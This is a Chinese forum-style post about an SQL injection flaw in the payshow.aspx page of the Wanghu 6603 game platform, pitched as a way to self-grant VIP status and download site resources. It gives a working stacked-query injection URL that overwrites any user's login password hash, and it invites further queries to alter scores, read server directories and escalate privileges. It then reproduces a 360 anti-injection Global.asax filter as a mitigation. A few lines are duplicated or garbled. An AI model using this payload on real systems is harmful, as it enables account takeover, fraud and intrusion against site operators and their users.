网狐6603 SQL注入任意修改数据

自助开通VIP,整站资源任意下载

先看下网站是否存在pay/payshow.aspx页面。

构造

url=http://192.168.1.8/pay/payshow.aspx?orderid=1';UPDATE%20QPAccountsDB.dbo.Accounts

Info%20SET%20LogonPass%20=%20'E10ADC3949BA59ABBE56E057F20F883E'%20WHER

E%20accounts%20=用户名%20--

E10ADC3949BA59ABBE56E057F20F883E=MD5(123456)

直接访问URL,看看密码是不是变成123456了。

自己构造别的语句,可以修改任意分数,读取服务器目录,提权...........

其他页面也有这样的BUG。

以下是360通用sql防注入方法。

-----------------使用方法------------------------------------------------------------------

1.将App_Code目录拷贝到web根目录

假如已经存在App_Code目录,那直接把App_Code目录里的360safe.cs文件拷贝到当前

App_Code目录即可。

2.将Global.asax文件拷贝到web根目录

假如已经存在Global.asax文件,那直接把下面这段代码

voidApplication_BeginRequest(objectsender,EventArgse)

{

if(Request.Cookies!=null)

{

if(safe_360.CookieData())

{

Response.Write("您提交的Cookie数据有恶意字符!");

Response.End();

}

}

if(Request.UrlReferrer!=null)

{

if(safe_360.referer()){

Response.Write("您提交的Referrer数据有恶意字符!");

Response.End();

}

网狐6603 SQL注入任意修改数据

}

if(Request.RequestType.ToUpper()=="POST")

网狐6603 SQL注入任意修改数据

 

- `3 ?! L6 J4 t& n% Z+ U

{

if(safe_360.PostData())

{

Response.Write("您提交的Post数据有恶意字符!");

Response.End();

}

}

if(Request.RequestType.ToUpper()=="GET")

{

if(safe_360.GetData())

{

Response.Write("您提交的Get数据有恶意字符!");

Response.End();

}

}

}

拷贝到当前的Global.asax文件里保存。

 

 

修复方法:安装个安全狗就OK了

本站源码仅做学术研究,自娱自乐使用,不得用于赌博性质的非法商业用途!转载请说明出处!
棋牌资源网 » 网狐6603 SQL注入任意修改数据

这里有你所需要的,找专业的人做专业的事!

游戏演示 联系客服